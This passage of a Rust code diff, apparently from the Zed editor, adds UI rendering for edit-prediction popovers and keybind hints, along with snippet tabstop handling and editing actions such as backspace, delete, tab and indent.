+ .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + let offset = point( + (text_bounds.size.width - size.width) / 2., + text_bounds.size.height - size.height - Self::EDIT_PREDICTION_POPOVER_PADDING_Y, + ); + + let origin = text_bounds.origin + offset; + element.prepaint_at(origin, window, cx); + Some((element, origin)) + } else { + self.render_edit_prediction_end_of_line_popover( + "Jump to Edit", + editor_snapshot, + visible_row_range, + target_display_point, + line_height, + scroll_pixel_position, + content_origin, + editor_width, + window, + cx, + ) + } + } + + fn render_edit_prediction_end_of_line_popover( + self: &mut Editor, + label: &'static str, + editor_snapshot: &EditorSnapshot, + visible_row_range: Range, + target_display_point: DisplayPoint, + line_height: Pixels, + scroll_pixel_position: gpui::Point, + content_origin: gpui::Point, + editor_width: Pixels, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let target_line_end = DisplayPoint::new( + target_display_point.row(), + editor_snapshot.line_len(target_display_point.row()), + ); + + let mut element = self + .render_edit_prediction_line_popover(label, None, window, cx)? 
+ .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + let line_origin = self.display_to_pixel_point(target_line_end, editor_snapshot, window)?; + + let start_point = content_origin - point(scroll_pixel_position.x, Pixels::ZERO); + let mut origin = start_point + + line_origin + + point(Self::EDIT_PREDICTION_POPOVER_PADDING_X, Pixels::ZERO); + origin.x = origin.x.max(content_origin.x); + + let max_x = content_origin.x + editor_width - size.width; + + if origin.x > max_x { + let offset = line_height + Self::EDIT_PREDICTION_POPOVER_PADDING_Y; + + let icon = if visible_row_range.contains(&(target_display_point.row() + 2)) { + origin.y += offset; + IconName::ArrowUp + } else { + origin.y -= offset; + IconName::ArrowDown + }; + + element = self + .render_edit_prediction_line_popover(label, Some(icon), window, cx)? + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + origin.x = content_origin.x + editor_width - size.width - px(2.); + } + + element.prepaint_at(origin, window, cx); + Some((element, origin)) + } + + fn render_edit_prediction_diff_popover( + self: &Editor, + text_bounds: &Bounds, + content_origin: gpui::Point, + editor_snapshot: &EditorSnapshot, + visible_row_range: Range, + line_layouts: &[LineWithInvisibles], + line_height: Pixels, + scroll_pixel_position: gpui::Point, + newest_selection_head: Option, + editor_width: Pixels, + style: &EditorStyle, + edits: &Vec<(Range, String)>, + edit_preview: &Option, + snapshot: &language::BufferSnapshot, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let edit_start = edits + .first() + .unwrap() + .0 + .start + .to_display_point(editor_snapshot); + let edit_end = edits + .last() + .unwrap() + .0 + .end + .to_display_point(editor_snapshot); + + let is_visible = visible_row_range.contains(&edit_start.row()) + || visible_row_range.contains(&edit_end.row()); + if !is_visible { + return None; + } + + 
let highlighted_edits = + crate::inline_completion_edit_text(&snapshot, edits, edit_preview.as_ref()?, false, cx); + + let styled_text = highlighted_edits.to_styled_text(&style.text); + let line_count = highlighted_edits.text.lines().count(); + + const BORDER_WIDTH: Pixels = px(1.); + + let keybind = self.render_edit_prediction_accept_keybind(window, cx); + let has_keybind = keybind.is_some(); + + let mut element = h_flex() + .items_start() + .child( + h_flex() + .bg(cx.theme().colors().editor_background) + .border(BORDER_WIDTH) + .shadow_sm() + .border_color(cx.theme().colors().border) + .rounded_l_lg() + .when(line_count > 1, |el| el.rounded_br_lg()) + .pr_1() + .child(styled_text), + ) + .child( + h_flex() + .h(line_height + BORDER_WIDTH * 2.) + .px_1p5() + .gap_1() + // Workaround: For some reason, there's a gap if we don't do this + .ml(-BORDER_WIDTH) + .shadow(vec![gpui::BoxShadow { + color: gpui::black().opacity(0.05), + offset: point(px(1.), px(1.)), + blur_radius: px(2.), + spread_radius: px(0.), + }]) + .bg(Editor::edit_prediction_line_popover_bg_color(cx)) + .border(BORDER_WIDTH) + .border_color(cx.theme().colors().border) + .rounded_r_lg() + .id("edit_prediction_diff_popover_keybind") + .when(!has_keybind, |el| { + let status_colors = cx.theme().status(); + + el.bg(status_colors.error_background) + .border_color(status_colors.error.opacity(0.6)) + .child(Icon::new(IconName::Info).color(Color::Error)) + .cursor_default() + .hoverable_tooltip(move |_window, cx| { + cx.new(|_| MissingEditPredictionKeybindingTooltip).into() + }) + }) + .children(keybind), + ) + .into_any(); + + let longest_row = + editor_snapshot.longest_row_in_range(edit_start.row()..edit_end.row() + 1); + let longest_line_width = if visible_row_range.contains(&longest_row) { + line_layouts[(longest_row.0 - visible_row_range.start.0) as usize].width + } else { + layout_line( + longest_row, + editor_snapshot, + style, + editor_width, + |_| false, + window, + cx, + ) + .width + }; + + let 
viewport_bounds = + Bounds::new(Default::default(), window.viewport_size()).extend(Edges { + right: -EditorElement::SCROLLBAR_WIDTH, + ..Default::default() + }); + + let x_after_longest = + text_bounds.origin.x + longest_line_width + Self::EDIT_PREDICTION_POPOVER_PADDING_X + - scroll_pixel_position.x; + + let element_bounds = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + // Fully visible if it can be displayed within the window (allow overlapping other + // panes). However, this is only allowed if the popover starts within text_bounds. + let can_position_to_the_right = x_after_longest < text_bounds.right() + && x_after_longest + element_bounds.width < viewport_bounds.right(); + + let mut origin = if can_position_to_the_right { + point( + x_after_longest, + text_bounds.origin.y + edit_start.row().as_f32() * line_height + - scroll_pixel_position.y, + ) + } else { + let cursor_row = newest_selection_head.map(|head| head.row()); + let above_edit = edit_start + .row() + .0 + .checked_sub(line_count as u32) + .map(DisplayRow); + let below_edit = Some(edit_end.row() + 1); + let above_cursor = + cursor_row.and_then(|row| row.0.checked_sub(line_count as u32).map(DisplayRow)); + let below_cursor = cursor_row.map(|cursor_row| cursor_row + 1); + + // Place the edit popover adjacent to the edit if there is a location + // available that is onscreen and does not obscure the cursor. Otherwise, + // place it adjacent to the cursor. 
+ let row_target = [above_edit, below_edit, above_cursor, below_cursor] + .into_iter() + .flatten() + .find(|&start_row| { + let end_row = start_row + line_count as u32; + visible_row_range.contains(&start_row) + && visible_row_range.contains(&end_row) + && cursor_row.map_or(true, |cursor_row| { + !((start_row..end_row).contains(&cursor_row)) + }) + })?; + + content_origin + + point( + -scroll_pixel_position.x, + row_target.as_f32() * line_height - scroll_pixel_position.y, + ) + }; + + origin.x -= BORDER_WIDTH; + + window.defer_draw(element, origin, 1); + + // Do not return an element, since it will already be drawn due to defer_draw. + None + } + + fn edit_prediction_cursor_popover_height(&self) -> Pixels { + px(30.) + } + + fn current_user_player_color(&self, cx: &mut App) -> PlayerColor { + if self.read_only(cx) { + cx.theme().players().read_only() + } else { + self.style.as_ref().unwrap().local_player + } + } + + fn render_edit_prediction_accept_keybind( + &self, + window: &mut Window, + cx: &App, + ) -> Option { + let accept_binding = self.accept_edit_prediction_keybind(window, cx); + let accept_keystroke = accept_binding.keystroke()?; + + let is_platform_style_mac = PlatformStyle::platform() == PlatformStyle::Mac; + + let modifiers_color = if accept_keystroke.modifiers == window.modifiers() { + Color::Accent + } else { + Color::Muted + }; + + h_flex() + .px_0p5() + .when(is_platform_style_mac, |parent| parent.gap_0p5()) + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) + .text_size(TextSize::XSmall.rems(cx)) + .child(h_flex().children(ui::render_modifiers( + &accept_keystroke.modifiers, + PlatformStyle::platform(), + Some(modifiers_color), + Some(IconSize::XSmall.rems().into()), + true, + ))) + .when(is_platform_style_mac, |parent| { + parent.child(accept_keystroke.key.clone()) + }) + .when(!is_platform_style_mac, |parent| { + parent.child( + Key::new( + util::capitalize(&accept_keystroke.key), + Some(Color::Default), + ) + 
.size(Some(IconSize::XSmall.rems().into())), + ) + }) + .into_any() + .into() + } + + fn render_edit_prediction_line_popover( + &self, + label: impl Into, + icon: Option, + window: &mut Window, + cx: &App, + ) -> Option> { + let padding_right = if icon.is_some() { px(4.) } else { px(8.) }; + + let keybind = self.render_edit_prediction_accept_keybind(window, cx); + let has_keybind = keybind.is_some(); + + let result = h_flex() + .id("ep-line-popover") + .py_0p5() + .pl_1() + .pr(padding_right) + .gap_1() + .rounded_md() + .border_1() + .bg(Self::edit_prediction_line_popover_bg_color(cx)) + .border_color(Self::edit_prediction_callout_popover_border_color(cx)) + .shadow_sm() + .when(!has_keybind, |el| { + let status_colors = cx.theme().status(); + + el.bg(status_colors.error_background) + .border_color(status_colors.error.opacity(0.6)) + .pl_2() + .child(Icon::new(IconName::ZedPredictError).color(Color::Error)) + .cursor_default() + .hoverable_tooltip(move |_window, cx| { + cx.new(|_| MissingEditPredictionKeybindingTooltip).into() + }) + }) + .children(keybind) + .child( + Label::new(label) + .size(LabelSize::Small) + .when(!has_keybind, |el| { + el.color(cx.theme().status().error.into()).strikethrough() + }), + ) + .when(!has_keybind, |el| { + el.child( + h_flex().ml_1().child( + Icon::new(IconName::Info) + .size(IconSize::Small) + .color(cx.theme().status().error.into()), + ), + ) + }) + .when_some(icon, |element, icon| { + element.child( + div() + .mt(px(1.5)) + .child(Icon::new(icon).size(IconSize::Small)), + ) + }); + + Some(result) + } + + fn edit_prediction_line_popover_bg_color(cx: &App) -> Hsla { + let accent_color = cx.theme().colors().text_accent; + let editor_bg_color = cx.theme().colors().editor_background; + editor_bg_color.blend(accent_color.opacity(0.1)) + } + + fn edit_prediction_callout_popover_border_color(cx: &App) -> Hsla { + let accent_color = cx.theme().colors().text_accent; + let editor_bg_color = cx.theme().colors().editor_background; + 
editor_bg_color.blend(accent_color.opacity(0.6)) + } + + fn render_edit_prediction_cursor_popover( + &self, + min_width: Pixels, + max_width: Pixels, + cursor_point: Point, + style: &EditorStyle, + accept_keystroke: Option<&gpui::Keystroke>, + _window: &Window, + cx: &mut Context, + ) -> Option { + let provider = self.edit_prediction_provider.as_ref()?; + + if provider.provider.needs_terms_acceptance(cx) { + return Some( + h_flex() + .min_w(min_width) + .flex_1() + .px_2() + .py_1() + .gap_3() + .elevation_2(cx) + .hover(|style| style.bg(cx.theme().colors().element_hover)) + .id("accept-terms") + .cursor_pointer() + .on_mouse_down(MouseButton::Left, |_, window, _| window.prevent_default()) + .on_click(cx.listener(|this, _event, window, cx| { + cx.stop_propagation(); + this.report_editor_event("Edit Prediction Provider ToS Clicked", None, cx); + window.dispatch_action( + zed_actions::OpenZedPredictOnboarding.boxed_clone(), + cx, + ); + })) + .child( + h_flex() + .flex_1() + .gap_2() + .child(Icon::new(IconName::ZedPredict)) + .child(Label::new("Accept Terms of Service")) + .child(div().w_full()) + .child( + Icon::new(IconName::ArrowUpRight) + .color(Color::Muted) + .size(IconSize::Small), + ) + .into_any_element(), + ) + .into_any(), + ); + } + + let is_refreshing = provider.provider.is_refreshing(cx); + + fn pending_completion_container() -> Div { + h_flex() + .h_full() + .flex_1() + .gap_2() + .child(Icon::new(IconName::ZedPredict)) + } + + let completion = match &self.active_inline_completion { + Some(prediction) => { + if !self.has_visible_completions_menu() { + const RADIUS: Pixels = px(6.); + const BORDER_WIDTH: Pixels = px(1.); + + return Some( + h_flex() + .elevation_2(cx) + .border(BORDER_WIDTH) + .border_color(cx.theme().colors().border) + .when(accept_keystroke.is_none(), |el| { + el.border_color(cx.theme().status().error) + }) + .rounded(RADIUS) + .rounded_tl(px(0.)) + .overflow_hidden() + .child(div().px_1p5().child(match &prediction.completion { + 
InlineCompletion::Move { target, snapshot } => { + use text::ToPoint as _; + if target.text_anchor.to_point(&snapshot).row > cursor_point.row + { + Icon::new(IconName::ZedPredictDown) + } else { + Icon::new(IconName::ZedPredictUp) + } + } + InlineCompletion::Edit { .. } => Icon::new(IconName::ZedPredict), + })) + .child( + h_flex() + .gap_1() + .py_1() + .px_2() + .rounded_r(RADIUS - BORDER_WIDTH) + .border_l_1() + .border_color(cx.theme().colors().border) + .bg(Self::edit_prediction_line_popover_bg_color(cx)) + .when(self.edit_prediction_preview.released_too_fast(), |el| { + el.child( + Label::new("Hold") + .size(LabelSize::Small) + .when(accept_keystroke.is_none(), |el| { + el.strikethrough() + }) + .line_height_style(LineHeightStyle::UiLabel), + ) + }) + .id("edit_prediction_cursor_popover_keybind") + .when(accept_keystroke.is_none(), |el| { + let status_colors = cx.theme().status(); + + el.bg(status_colors.error_background) + .border_color(status_colors.error.opacity(0.6)) + .child(Icon::new(IconName::Info).color(Color::Error)) + .cursor_default() + .hoverable_tooltip(move |_window, cx| { + cx.new(|_| MissingEditPredictionKeybindingTooltip) + .into() + }) + }) + .when_some( + accept_keystroke.as_ref(), + |el, accept_keystroke| { + el.child(h_flex().children(ui::render_modifiers( + &accept_keystroke.modifiers, + PlatformStyle::platform(), + Some(Color::Default), + Some(IconSize::XSmall.rems().into()), + false, + ))) + }, + ), + ) + .into_any(), + ); + } + + self.render_edit_prediction_cursor_popover_preview( + prediction, + cursor_point, + style, + cx, + )? 
+ } + + None if is_refreshing => match &self.stale_inline_completion_in_menu { + Some(stale_completion) => self.render_edit_prediction_cursor_popover_preview( + stale_completion, + cursor_point, + style, + cx, + )?, + + None => { + pending_completion_container().child(Label::new("...").size(LabelSize::Small)) + } + }, + + None => pending_completion_container().child(Label::new("No Prediction")), + }; + + let completion = if is_refreshing { + completion + .with_animation( + "loading-completion", + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.4, 0.8)), + |label, delta| label.opacity(delta), + ) + .into_any_element() + } else { + completion.into_any_element() + }; + + let has_completion = self.active_inline_completion.is_some(); + + let is_platform_style_mac = PlatformStyle::platform() == PlatformStyle::Mac; + Some( + h_flex() + .min_w(min_width) + .max_w(max_width) + .flex_1() + .elevation_2(cx) + .border_color(cx.theme().colors().border) + .child( + div() + .flex_1() + .py_1() + .px_2() + .overflow_hidden() + .child(completion), + ) + .when_some(accept_keystroke, |el, accept_keystroke| { + if !accept_keystroke.modifiers.modified() { + return el; + } + + el.child( + h_flex() + .h_full() + .border_l_1() + .rounded_r_lg() + .border_color(cx.theme().colors().border) + .bg(Self::edit_prediction_line_popover_bg_color(cx)) + .gap_1() + .py_1() + .px_2() + .child( + h_flex() + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) + .when(is_platform_style_mac, |parent| parent.gap_1()) + .child(h_flex().children(ui::render_modifiers( + &accept_keystroke.modifiers, + PlatformStyle::platform(), + Some(if !has_completion { + Color::Muted + } else { + Color::Default + }), + None, + false, + ))), + ) + .child(Label::new("Preview").into_any_element()) + .opacity(if has_completion { 1.0 } else { 0.4 }), + ) + }) + .into_any(), + ) + } + + fn render_edit_prediction_cursor_popover_preview( + &self, + completion: 
&InlineCompletionState, + cursor_point: Point, + style: &EditorStyle, + cx: &mut Context, + ) -> Option
{ + use text::ToPoint as _; + + fn render_relative_row_jump( + prefix: impl Into, + current_row: u32, + target_row: u32, + ) -> Div { + let (row_diff, arrow) = if target_row < current_row { + (current_row - target_row, IconName::ArrowUp) + } else { + (target_row - current_row, IconName::ArrowDown) + }; + + h_flex() + .child( + Label::new(format!("{}{}", prefix.into(), row_diff)) + .color(Color::Muted) + .size(LabelSize::Small), + ) + .child(Icon::new(arrow).color(Color::Muted).size(IconSize::Small)) + } + + match &completion.completion { + InlineCompletion::Move { + target, snapshot, .. + } => Some( + h_flex() + .px_2() + .gap_2() + .flex_1() + .child( + if target.text_anchor.to_point(&snapshot).row > cursor_point.row { + Icon::new(IconName::ZedPredictDown) + } else { + Icon::new(IconName::ZedPredictUp) + }, + ) + .child(Label::new("Jump to Edit")), + ), + + InlineCompletion::Edit { + edits, + edit_preview, + snapshot, + display_mode: _, + } => { + let first_edit_row = edits.first()?.0.start.text_anchor.to_point(&snapshot).row; + + let (highlighted_edits, has_more_lines) = crate::inline_completion_edit_text( + &snapshot, + &edits, + edit_preview.as_ref()?, + true, + cx, + ) + .first_line_preview(); + + let styled_text = gpui::StyledText::new(highlighted_edits.text) + .with_default_highlights(&style.text, highlighted_edits.highlights); + + let preview = h_flex() + .gap_1() + .min_w_16() + .child(styled_text) + .when(has_more_lines, |parent| parent.child("…")); + + let left = if first_edit_row != cursor_point.row { + render_relative_row_jump("", cursor_point.row, first_edit_row) + .into_any_element() + } else { + Icon::new(IconName::ZedPredict).into_any_element() + }; + + Some( + h_flex() + .h_full() + .flex_1() + .gap_2() + .pr_1() + .overflow_x_hidden() + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) + .child(left) + .child(preview), + ) + } + } + } + + fn render_context_menu( + &self, + style: &EditorStyle, + max_height_in_lines: u32, + 
window: &mut Window, + cx: &mut Context, + ) -> Option { + let menu = self.context_menu.borrow(); + let menu = menu.as_ref()?; + if !menu.visible() { + return None; + }; + Some(menu.render(style, max_height_in_lines, window, cx)) + } + + fn render_context_menu_aside( + &mut self, + max_size: Size, + window: &mut Window, + cx: &mut Context, + ) -> Option { + self.context_menu.borrow_mut().as_mut().and_then(|menu| { + if menu.visible() { + menu.render_aside(self, max_size, window, cx) + } else { + None + } + }) + } + + fn hide_context_menu( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> Option { + cx.notify(); + self.completion_tasks.clear(); + let context_menu = self.context_menu.borrow_mut().take(); + self.stale_inline_completion_in_menu.take(); + self.update_visible_inline_completion(window, cx); + context_menu + } + + fn show_snippet_choices( + &mut self, + choices: &Vec, + selection: Range, + cx: &mut Context, + ) { + if selection.start.buffer_id.is_none() { + return; + } + let buffer_id = selection.start.buffer_id.unwrap(); + let buffer = self.buffer().read(cx).buffer(buffer_id); + let id = post_inc(&mut self.next_completion_id); + let snippet_sort_order = EditorSettings::get_global(cx).snippet_sort_order; + + if let Some(buffer) = buffer { + *self.context_menu.borrow_mut() = Some(CodeContextMenu::Completions( + CompletionsMenu::new_snippet_choices( + id, + true, + choices, + selection, + buffer, + snippet_sort_order, + ), + )); + } + } + + pub fn insert_snippet( + &mut self, + insertion_ranges: &[Range], + snippet: Snippet, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + struct Tabstop { + is_end_tabstop: bool, + ranges: Vec>, + choices: Option>, + } + + let tabstops = self.buffer.update(cx, |buffer, cx| { + let snippet_text: Arc = snippet.text.clone().into(); + let edits = insertion_ranges + .iter() + .cloned() + .map(|range| (range, snippet_text.clone())); + buffer.edit(edits, Some(AutoindentMode::EachLine), cx); + + let 
snapshot = &*buffer.read(cx); + let snippet = &snippet; + snippet + .tabstops + .iter() + .map(|tabstop| { + let is_end_tabstop = tabstop.ranges.first().map_or(false, |tabstop| { + tabstop.is_empty() && tabstop.start == snippet.text.len() as isize + }); + let mut tabstop_ranges = tabstop + .ranges + .iter() + .flat_map(|tabstop_range| { + let mut delta = 0_isize; + insertion_ranges.iter().map(move |insertion_range| { + let insertion_start = insertion_range.start as isize + delta; + delta += + snippet.text.len() as isize - insertion_range.len() as isize; + + let start = ((insertion_start + tabstop_range.start) as usize) + .min(snapshot.len()); + let end = ((insertion_start + tabstop_range.end) as usize) + .min(snapshot.len()); + snapshot.anchor_before(start)..snapshot.anchor_after(end) + }) + }) + .collect::>(); + tabstop_ranges.sort_unstable_by(|a, b| a.start.cmp(&b.start, snapshot)); + + Tabstop { + is_end_tabstop, + ranges: tabstop_ranges, + choices: tabstop.choices.clone(), + } + }) + .collect::>() + }); + if let Some(tabstop) = tabstops.first() { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(tabstop.ranges.iter().cloned()); + }); + + if let Some(choices) = &tabstop.choices { + if let Some(selection) = tabstop.ranges.first() { + self.show_snippet_choices(choices, selection.clone(), cx) + } + } + + // If we're already at the last tabstop and it's at the end of the snippet, + // we're done, we don't need to keep the state around. + if !tabstop.is_end_tabstop { + let choices = tabstops + .iter() + .map(|tabstop| tabstop.choices.clone()) + .collect(); + + let ranges = tabstops + .into_iter() + .map(|tabstop| tabstop.ranges) + .collect::>(); + + self.snippet_stack.push(SnippetState { + active_index: 0, + ranges, + choices, + }); + } + + // Check whether the just-entered snippet ends with an auto-closable bracket. 
+ if self.autoclose_regions.is_empty() { + let snapshot = self.buffer.read(cx).snapshot(cx); + for selection in &mut self.selections.all::(cx) { + let selection_head = selection.head(); + let Some(scope) = snapshot.language_scope_at(selection_head) else { + continue; + }; + + let mut bracket_pair = None; + let next_chars = snapshot.chars_at(selection_head).collect::(); + let prev_chars = snapshot + .reversed_chars_at(selection_head) + .collect::(); + for (pair, enabled) in scope.brackets() { + if enabled + && pair.close + && prev_chars.starts_with(pair.start.as_str()) + && next_chars.starts_with(pair.end.as_str()) + { + bracket_pair = Some(pair.clone()); + break; + } + } + if let Some(pair) = bracket_pair { + let snapshot_settings = snapshot.language_settings_at(selection_head, cx); + let autoclose_enabled = + self.use_autoclose && snapshot_settings.use_autoclose; + if autoclose_enabled { + let start = snapshot.anchor_after(selection_head); + let end = snapshot.anchor_after(selection_head); + self.autoclose_regions.push(AutocloseRegion { + selection_id: selection.id, + range: start..end, + pair, + }); + } + } + } + } + } + Ok(()) + } + + pub fn move_to_next_snippet_tabstop( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> bool { + self.move_to_snippet_tabstop(Bias::Right, window, cx) + } + + pub fn move_to_prev_snippet_tabstop( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> bool { + self.move_to_snippet_tabstop(Bias::Left, window, cx) + } + + pub fn move_to_snippet_tabstop( + &mut self, + bias: Bias, + window: &mut Window, + cx: &mut Context, + ) -> bool { + if let Some(mut snippet) = self.snippet_stack.pop() { + match bias { + Bias::Left => { + if snippet.active_index > 0 { + snippet.active_index -= 1; + } else { + self.snippet_stack.push(snippet); + return false; + } + } + Bias::Right => { + if snippet.active_index + 1 < snippet.ranges.len() { + snippet.active_index += 1; + } else { + self.snippet_stack.push(snippet); + return false; 
+ } + } + } + if let Some(current_ranges) = snippet.ranges.get(snippet.active_index) { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_anchor_ranges(current_ranges.iter().cloned()) + }); + + if let Some(choices) = &snippet.choices[snippet.active_index] { + if let Some(selection) = current_ranges.first() { + self.show_snippet_choices(&choices, selection.clone(), cx); + } + } + + // If snippet state is not at the last tabstop, push it back on the stack + if snippet.active_index + 1 < snippet.ranges.len() { + self.snippet_stack.push(snippet); + } + return true; + } + } + + false + } + + pub fn clear(&mut self, window: &mut Window, cx: &mut Context) { + self.transact(window, cx, |this, window, cx| { + this.select_all(&SelectAll, window, cx); + this.insert("", window, cx); + }); + } + + pub fn backspace(&mut self, _: &Backspace, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_autoclose_pair(window, cx); + let mut linked_ranges = HashMap::<_, Vec<_>>::default(); + if !this.linked_edit_ranges.is_empty() { + let selections = this.selections.all::(cx); + let snapshot = this.buffer.read(cx).snapshot(cx); + + for selection in selections.iter() { + let selection_start = snapshot.anchor_before(selection.start).text_anchor; + let selection_end = snapshot.anchor_after(selection.end).text_anchor; + if selection_start.buffer_id != selection_end.buffer_id { + continue; + } + if let Some(ranges) = + this.linked_editing_ranges_for(selection_start..selection_end, cx) + { + for (buffer, entries) in ranges { + linked_ranges.entry(buffer).or_default().extend(entries); + } + } + } + } + + let mut selections = this.selections.all::(cx); + let display_map = this.display_map.update(cx, |map, cx| map.snapshot(cx)); + for selection in &mut selections { + if selection.is_empty() { + let old_head = selection.head(); + let mut new_head = + 
movement::left(&display_map, old_head.to_display_point(&display_map)) + .to_point(&display_map); + if let Some((buffer, line_buffer_range)) = display_map + .buffer_snapshot + .buffer_line_for_row(MultiBufferRow(old_head.row)) + { + let indent_size = buffer.indent_size_for_line(line_buffer_range.start.row); + let indent_len = match indent_size.kind { + IndentKind::Space => { + buffer.settings_at(line_buffer_range.start, cx).tab_size + } + IndentKind::Tab => NonZeroU32::new(1).unwrap(), + }; + if old_head.column <= indent_size.len && old_head.column > 0 { + let indent_len = indent_len.get(); + new_head = cmp::min( + new_head, + MultiBufferPoint::new( + old_head.row, + ((old_head.column - 1) / indent_len) * indent_len, + ), + ); + } + } + + selection.set_head(new_head, SelectionGoal::None); + } + } + + this.signature_help_state.set_backspace_pressed(true); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + this.insert("", window, cx); + let empty_str: Arc = Arc::from(""); + for (buffer, edits) in linked_ranges { + let snapshot = buffer.read(cx).snapshot(); + use text::ToPoint as TP; + + let edits = edits + .into_iter() + .map(|range| { + let end_point = TP::to_point(&range.end, &snapshot); + let mut start_point = TP::to_point(&range.start, &snapshot); + + if end_point == start_point { + let offset = text::ToOffset::to_offset(&range.start, &snapshot) + .saturating_sub(1); + start_point = + snapshot.clip_point(TP::to_point(&offset, &snapshot), Bias::Left); + }; + + (start_point..end_point, empty_str.clone()) + }) + .sorted_by_key(|(range, _)| range.start) + .collect::>(); + buffer.update(cx, |this, cx| { + this.edit(edits, None, cx); + }) + } + this.refresh_inline_completion(true, false, window, cx); + linked_editing_ranges::refresh_linked_ranges(this, window, cx); + }); + } + + pub fn delete(&mut self, _: &Delete, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + 
self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = movement::right(map, selection.head()); + selection.end = cursor; + selection.reversed = true; + selection.goal = SelectionGoal::None; + } + }) + }); + this.insert("", window, cx); + this.refresh_inline_completion(true, false, window, cx); + }); + } + + pub fn backtab(&mut self, _: &Backtab, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + if self.move_to_prev_snippet_tabstop(window, cx) { + return; + } + self.outdent(&Outdent, window, cx); + } + + pub fn tab(&mut self, _: &Tab, window: &mut Window, cx: &mut Context) { + if self.move_to_next_snippet_tabstop(window, cx) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + return; + } + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let mut selections = self.selections.all_adjusted(cx); + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + let rows_iter = selections.iter().map(|s| s.head().row); + let suggested_indents = snapshot.suggested_indents(rows_iter, cx); + + let has_some_cursor_in_whitespace = selections + .iter() + .filter(|selection| selection.is_empty()) + .any(|selection| { + let cursor = selection.head(); + let current_indent = snapshot.indent_size_for_line(MultiBufferRow(cursor.row)); + cursor.column < current_indent.len + }); + + let mut edits = Vec::new(); + let mut prev_edited_row = 0; + let mut row_delta = 0; + for selection in &mut selections { + if selection.start.row != prev_edited_row { + row_delta = 0; + } + prev_edited_row = selection.end.row; + + // If the selection is non-empty, then increase the indentation of the selected lines. 
+ if !selection.is_empty() { + row_delta = + Self::indent_selection(buffer, &snapshot, selection, &mut edits, row_delta, cx); + continue; + } + + // If the selection is empty and the cursor is in the leading whitespace before the + // suggested indentation, then auto-indent the line. + let cursor = selection.head(); + let current_indent = snapshot.indent_size_for_line(MultiBufferRow(cursor.row)); + if let Some(suggested_indent) = + suggested_indents.get(&MultiBufferRow(cursor.row)).copied() + { + // If there exist any empty selection in the leading whitespace, then skip + // indent for selections at the boundary. + if has_some_cursor_in_whitespace + && cursor.column == current_indent.len + && current_indent.len == suggested_indent.len + { + continue; + } + + if cursor.column < suggested_indent.len + && cursor.column <= current_indent.len + && current_indent.len <= suggested_indent.len + { + selection.start = Point::new(cursor.row, suggested_indent.len); + selection.end = selection.start; + if row_delta == 0 { + edits.extend(Buffer::edit_for_indent_size_adjustment( + cursor.row, + current_indent, + suggested_indent, + )); + row_delta = suggested_indent.len - current_indent.len; + } + continue; + } + } + + // Otherwise, insert a hard or soft tab. 
+ let settings = buffer.language_settings_at(cursor, cx); + let tab_size = if settings.hard_tabs { + IndentSize::tab() + } else { + let tab_size = settings.tab_size.get(); + let indent_remainder = snapshot + .text_for_range(Point::new(cursor.row, 0)..cursor) + .flat_map(str::chars) + .fold(row_delta % tab_size, |counter: u32, c| { + if c == '\t' { + 0 + } else { + (counter + 1) % tab_size + } + }); + + let chars_to_next_tab_stop = tab_size - indent_remainder; + IndentSize::spaces(chars_to_next_tab_stop) + }; + selection.start = Point::new(cursor.row, cursor.column + row_delta + tab_size.len); + selection.end = selection.start; + edits.push((cursor..cursor, tab_size.chars().collect::())); + row_delta += tab_size.len; + } + + self.transact(window, cx, |this, window, cx| { + this.buffer.update(cx, |b, cx| b.edit(edits, None, cx)); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + this.refresh_inline_completion(true, false, window, cx); + }); + } + + pub fn indent(&mut self, _: &Indent, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let mut selections = self.selections.all::(cx); + let mut prev_edited_row = 0; + let mut row_delta = 0; + let mut edits = Vec::new(); + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + for selection in &mut selections { + if selection.start.row != prev_edited_row { + row_delta = 0; + } + prev_edited_row = selection.end.row; + + row_delta = + Self::indent_selection(buffer, &snapshot, selection, &mut edits, row_delta, cx); + } + + self.transact(window, cx, |this, window, cx| { + this.buffer.update(cx, |b, cx| b.edit(edits, None, cx)); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + }); + } + + fn indent_selection( + buffer: &MultiBuffer, + snapshot: &MultiBufferSnapshot, + selection: &mut Selection, + edits: &mut 
